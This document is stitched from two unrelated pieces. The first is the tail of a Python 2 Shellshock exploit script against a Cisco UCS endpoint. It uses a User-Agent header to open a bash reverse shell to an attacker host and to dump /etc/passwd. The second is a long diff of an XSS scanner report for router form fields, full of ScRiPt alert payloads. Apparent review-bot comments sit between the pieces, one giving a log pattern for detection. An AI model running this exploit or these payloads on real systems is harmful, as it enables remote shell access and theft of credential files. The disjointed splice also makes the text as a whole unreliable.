'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'
}
headers2 = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)'
}
def exploit():
try:
r = requests.get(url, headers=headers1, verify=False, timeout=5)
except Exception, e:
if 'timeout' in str(e):
print "[+] Success. Enjoy your shell..."
else:
print "[-] Something is wrong..."
print "[-] Error: " + str(e)
def main():
try:
r = requests.get(url, headers=headers2, verify=False, timeout=3)
if r.content.startswith('\nroot:'):
print "[+] Host is vulnerable, spawning shell..."
time.sleep(3)
exploit()
else:
print "[-] Host is not vulnerable, quitting..."
sys.exit()
except Exception, e:
print "[-] Something is wrong..."
print "[-] Error: " + str(e)
if __name__ == "__main__":
main()
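Review bot: the script is Python 2 only (print statements throughout, and "except Exception, e" in both exploit() and main()), yet the header and the "#!/usr/bin/python" shebang do not say so; state the interpreter version in the header comment. The header also says "more are likely vulnerable" without naming fixed releases, so point readers explicitly to the linked Cisco advisory for those. For defenders reading this entry, both requests in the file go to /ucsm/isSamInstalled.cgi with a User-Agent that begins "() {", which is the pattern to alert on in proxy and web server logs.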


@ -115,9 +115,9 @@ The POST variable BackButton has been set to >"><ScRiPt%20%0a%0d>alert(416215520
/Forms/error_1 /Forms/error_1
Details Details
The POST variable BackButton has been set to </textarea><ScRiPt%20%0a%0d>alert(416225520282)%3B</ScRiPt> . The POST variable BackButton has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(416225520282)%3B</ScRiPt> .
BackButton=</textarea><ScRiPt%20%0a%0d>alert(416225520282)%3B</ScRiPt> BackButton=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(416225520282)%3B</ScRiPt>
################################################################################################################################## ##################################################################################################################################
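Review bot: this hunk, like every other hunk in this file, rewrites </textarea> to &lt;/textarea&gt; in both the "has been set to" sentence and the raw POST body line (BackButton=...), while the <ScRiPt%20%0a%0d> that follows stays raw and the other payload in the hunk header context (>"><ScRiPt...) is untouched. The POST body lines are recorded request data from the scan report and should stay byte-for-byte as captured; a global search-and-replace on one string appears to have run over the file. Revert it across all hunks of this file rather than fixing them one by one.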
@ -199,9 +199,9 @@ wzConnFlag=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28401565272624%29%3B%22%
/Forms/fresh_pppoe_1 /Forms/fresh_pppoe_1
Details Details
The POST variable wzConnFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(401515272624)%3B</ScRiPt> . The POST variable wzConnFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(401515272624)%3B</ScRiPt> .
wzConnFlag=</textarea><ScRiPt%20%0a%0d>alert(401515272624)%3B</ScRiPt> wzConnFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(401515272624)%3B</ScRiPt>
################################################################################################################################## ##################################################################################################################################
@ -274,9 +274,9 @@ diag_pppindex_argen=email@some<ScRiPt%20%0a%0d>alert(407145360657)%3B</ScRiPt>do
/Forms/rpDiag_argen_1 /Forms/rpDiag_argen_1
Details Details
The POST variable diag_pppindex_argen has been set to </textarea><ScRiPt%20%0a%0d>alert(407115360657)%3B</ScRiPt> . The POST variable diag_pppindex_argen has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(407115360657)%3B</ScRiPt> .
diag_pppindex_argen=</textarea><ScRiPt%20%0a%0d>alert(407115360657)%3B</ScRiPt>&DiagArgenTest=Test&DiagStartFlag=0 diag_pppindex_argen=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(407115360657)%3B</ScRiPt>&DiagArgenTest=Test&DiagStartFlag=0
################################################################################################################################## ##################################################################################################################################
@ -369,9 +369,9 @@ diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag=<script>alert(40717536066
/Forms/rpDiag_argen_1 /Forms/rpDiag_argen_1
Details Details
The POST variable DiagStartFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(407215360661)%3B</ScRiPt> . The POST variable DiagStartFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(407215360661)%3B</ScRiPt> .
diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag=</textarea><ScRiPt%20%0a%0d>aler diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>aler
################################################################################################################################## ##################################################################################################################################
@ -401,9 +401,9 @@ wzdmz_active=</title><ScRiPt%20%0a%0d>alert(414945497855)%3B</ScRiPt>&wzdmzHostI
/Forms/rpNATdmz_argen_1 /Forms/rpNATdmz_argen_1
Details Details
The POST variable wzdmz_active has been set to </textarea><ScRiPt%20%0a%0d>alert(414935497855)%3B</ScRiPt> . The POST variable wzdmz_active has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(414935497855)%3B</ScRiPt> .
wzdmz_active=</textarea><ScRiPt%20%0a%0d>alert(414935497855)%3B</ScRiPt>&wzdmzHostIP=0%2E0%2E0%2E0&NATDMZApply=Aceptar wzdmz_active=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(414935497855)%3B</ScRiPt>&wzdmzHostIP=0%2E0%2E0%2E0&NATDMZApply=Aceptar
################################################################################################################################## ##################################################################################################################################
@ -473,9 +473,9 @@ wzdmz_active=>'><ScRiPt%20%0a%0d>alert(414915497855)%3B</ScRiPt>&wzdmzHostIP=0%2
/Forms/rpNATdmz_argen_1 /Forms/rpNATdmz_argen_1
Details Details
The POST variable wzdmzHostIP has been set to </textarea><ScRiPt%20%0a%0d>alert(415035497857)%3B</ScRiPt> . The POST variable wzdmzHostIP has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(415035497857)%3B</ScRiPt> .
wzdmz_active=1&wzdmzHostIP=</textarea><ScRiPt%20%0a%0d>alert(415035497857)%3B</ScRiPt>&NATDMZApply=Aceptar wzdmz_active=1&wzdmzHostIP=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(415035497857)%3B</ScRiPt>&NATDMZApply=Aceptar
################################################################################################################################## ##################################################################################################################################
@ -553,9 +553,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_endPort has been set to </textarea><ScRiPt%20%0a%0d>alert(409405385265)%3B</ScRiPt> . The POST variable wzVIRTUALSVR_endPort has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409405385265)%3B</ScRiPt> .
wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=</textarea><ScRiPt%20%0a%0d>alert(409405385265)%3B</ScRiPt>&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409405385265)%3B</ScRiPt>&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -655,9 +655,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_endPort has been set to </textarea><ScRiPt%20%0a%0d>alert(408805384923)%3B</ScRiPt> . The POST variable wzVIRTUALSVR_endPort has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408805384923)%3B</ScRiPt> .
wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=</textarea><ScRiPt%20%0a%0d>alert(408805384923)%3B</ScRiPt>&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408805384923)%3B</ScRiPt>&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -781,9 +781,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_endPortLocal has been set to </textarea><ScRiPt%20%0a%0d>alert(409105385033)%3B</ScRiPt> . The POST variable wzVIRTUALSVR_endPortLocal has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409105385033)%3B</ScRiPt> .
wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=</textarea><ScRiPt%20%0a%0d>alert(409105385033)%3B</ScRiPt>&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409105385033)%3B</ScRiPt>&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -821,9 +821,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_endPortLocal has been set to </textarea><ScRiPt%20%0a%0d>alert(409705385375)%3B</ScRiPt> . The POST variable wzVIRTUALSVR_endPortLocal has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409705385375)%3B</ScRiPt> .
wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=</textarea><ScRiPt%20%0a%0d>alert(409705385375)%3B</ScRiPt>&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409705385375)%3B</ScRiPt>&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -845,7 +845,7 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=</title>
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_IndexFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(408605384811)%3B</ScRiPt> .wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=</textarea><ScRiPt%20%0a%0d>alert(408605384811)%3B</ScRiPt>&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar The POST variable wzVIRTUALSVR_IndexFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408605384811)%3B</ScRiPt> .wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408605384811)%3B</ScRiPt>&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -944,9 +944,9 @@ wzVIRTUALSVR_IndexFlag=>'><ScRiPt%20%0a%0d>alert(409185385252)%3B</ScRiPt>&wzVIR
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_IndexFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(409205385252)%3B</ScRiPt> . The POST variable wzVIRTUALSVR_IndexFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409205385252)%3B</ScRiPt> .
wzVIRTUALSVR_IndexFlag=</textarea><ScRiPt%20%0a%0d>alert(409205385252)%3B</ScRiPt>&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar wzVIRTUALSVR_IndexFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409205385252)%3B</ScRiPt>&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -1072,9 +1072,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_localIP has been set to </textarea><ScRiPt%20%0a%0d>alert(408905384923)%3B</ScRiPt> . The POST variable wzVIRTUALSVR_localIP has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408905384923)%3B</ScRiPt> .
wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=</textarea><ScRiPt%20%0a%0d>alert(408905384923)%3B</ScRiPt>&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408905384923)%3B</ScRiPt>&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -1120,9 +1120,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_localIP has been set to </textarea><ScRiPt%20%0a%0d>alert(409505385265)%3B</ScRiPt> . The POST variable wzVIRTUALSVR_localIP has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409505385265)%3B</ScRiPt> .
wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=</textarea><ScRiPt%20%0a%0d>alert(409505385265)%3B</ScRiPt>&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409505385265)%3B</ScRiPt>&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -1190,9 +1190,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=--><S
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_startPort has been set to </textarea><ScRiPt%20%0a%0d>alert(409305385263)%3B</ScRiPt> . The POST variable wzVIRTUALSVR_startPort has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409305385263)%3B</ScRiPt> .
wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=</textarea><ScRiPt%20%0a%0d>alert(409305385263)%3B</ScRiPt>&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409305385263)%3B</ScRiPt>&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -1206,9 +1206,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=</tit
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_startPort has been set to </textarea><ScRiPt%20%0a%0d>alert(408705384921)%3B</ScRiPt> . The POST variable wzVIRTUALSVR_startPort has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408705384921)%3B</ScRiPt> .
wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=</textarea><ScRiPt%20%0a%0d>alert(408705384921)%3B</ScRiPt>&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(408705384921)%3B</ScRiPt>&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -1278,9 +1278,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_startPortLocal has been set to </textarea><ScRiPt%20%0a%0d>alert(409605385375)%3B</ScRiPt> . The POST variable wzVIRTUALSVR_startPortLocal has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409605385375)%3B</ScRiPt> .
wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=</textarea><ScRiPt%20%0a%0d>alert(409605385375)%3B</ScRiPt>&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409605385375)%3B</ScRiPt>&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -1358,9 +1358,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT
/Forms/rpNATvirsvr_argen_1 /Forms/rpNATvirsvr_argen_1
Details Details
The POST variable wzVIRTUALSVR_startPortLocal has been set to </textarea><ScRiPt%20%0a%0d>alert(409005385033)%3B</ScRiPt> . The POST variable wzVIRTUALSVR_startPortLocal has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409005385033)%3B</ScRiPt> .
wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=</textarea><ScRiPt%20%0a%0d>alert(409005385033)%3B</ScRiPt>&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(409005385033)%3B</ScRiPt>&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar
################################################################################################################################## ##################################################################################################################################
@ -1486,9 +1486,9 @@ Connect_DialHidden=0&Connect_DialFlag=>'><ScRiPt%20%0a%0d>alert(402485284507)%3B
/Forms/rpStatus_argen_1 /Forms/rpStatus_argen_1
Details Details
The POST variable Connect_DialFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(402505284507)%3B</ScRiPt> . The POST variable Connect_DialFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402505284507)%3B</ScRiPt> .
Connect_DialHidden=0&Connect_DialFlag=</textarea><ScRiPt%20%0a%0d>alert(402505284507)%3B</ScRiPt>&Connect_Flag=0 Connect_DialHidden=0&Connect_DialFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402505284507)%3B</ScRiPt>&Connect_Flag=0
################################################################################################################################## ##################################################################################################################################
@ -1526,9 +1526,9 @@ Connect_DialHidden=email@some<ScRiPt%20%0a%0d>alert(402435284505)%3B</ScRiPt>dom
/Forms/rpStatus_argen_1 /Forms/rpStatus_argen_1
Details Details
The POST variable Connect_DialHidden has been set to </textarea><ScRiPt%20%0a%0d>alert(402405284505)%3B</ScRiPt> . The POST variable Connect_DialHidden has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402405284505)%3B</ScRiPt> .
Connect_DialHidden=</textarea><ScRiPt%20%0a%0d>alert(402405284505)%3B</ScRiPt>&Connect_ Connect_DialHidden=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402405284505)%3B</ScRiPt>&Connect_
################################################################################################################################## ##################################################################################################################################
@ -1566,9 +1566,9 @@ Connect_DialHidden=>'><ScRiPt%20%0a%0d>alert(402385284505)%3B</ScRiPt>&Connect_D
/Forms/rpStatus_argen_1 /Forms/rpStatus_argen_1
Details Details
The POST variable Connect_Flag has been set to </textarea><ScRiPt%20%0a%0d>alert(402605284509)%3B</ScRiPt> . The POST variable Connect_Flag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402605284509)%3B</ScRiPt> .
Connect_DialHidden=0&Connect_DialFlag=0&Connect_Flag=</textarea><ScRiPt%20%0a%0d>alert(402605284509)%3B</ScRiPt> Connect_DialHidden=0&Connect_DialFlag=0&Connect_Flag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(402605284509)%3B</ScRiPt>
################################################################################################################################## ##################################################################################################################################
@ -1756,9 +1756,9 @@ The POST variable Telephone_select has been set to >'><ScRiPt%20%0a%0d>alert(404
/Forms/rpwizard_1 /Forms/rpwizard_1
Details Details
The POST variable Telephone_select has been set to </textarea><ScRiPt%20%0a%0d>alert(404165310549)%3B</ScRiPt> . The POST variable Telephone_select has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404165310549)%3B</ScRiPt> .
Telephone_select=</textarea><ScRiPt%20%0a%0d>alert(404165310549)%3B</ScRiPt>&wzArgentinaNext=Continuar&wzFirstFlag=0 Telephone_select=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404165310549)%3B</ScRiPt>&wzArgentinaNext=Continuar&wzFirstFlag=0
################################################################################################################################## ##################################################################################################################################
@ -1816,7 +1816,7 @@ Telephone_select=email@some<ScRiPt%20%0a%0d>alert(404195310549)%3B</ScRiPt>domai
/Forms/rpwizard_1 /Forms/rpwizard_1
Details Details
The POST variable Telephone_select has been set to </textarea><ScRiPt%20%0a%0d>alert(404365310550)%3B</ScRiPt> .Telephone_select=</textarea><ScRiPt%20%0a%0d>alert(404365310550)%3B</ScRiPt>&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=0 The POST variable Telephone_select has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404365310550)%3B</ScRiPt> .Telephone_select=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404365310550)%3B</ScRiPt>&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=0
################################################################################################################################## ##################################################################################################################################
@ -1846,9 +1846,9 @@ Telephone_select=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28404215310549%29%
/Forms/rpwizard_1 /Forms/rpwizard_1
Details Details
The POST variable Telephone_select has been set to </textarea><ScRiPt%20%0a%0d>alert(404465310552)%3B</ScRiPt> . The POST variable Telephone_select has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404465310552)%3B</ScRiPt> .
Telephone_select=0&Telephone_select=</textarea><ScRiPt%20%0a%0d>alert(404465310552)%3B</ScRiPt>&wzArgentinaNext=Continuar&wzFirstFlag=0 Telephone_select=0&Telephone_select=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404465310552)%3B</ScRiPt>&wzArgentinaNext=Continuar&wzFirstFlag=0
################################################################################################################################## ##################################################################################################################################
@ -1878,9 +1878,9 @@ Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=<script>alert(404225310
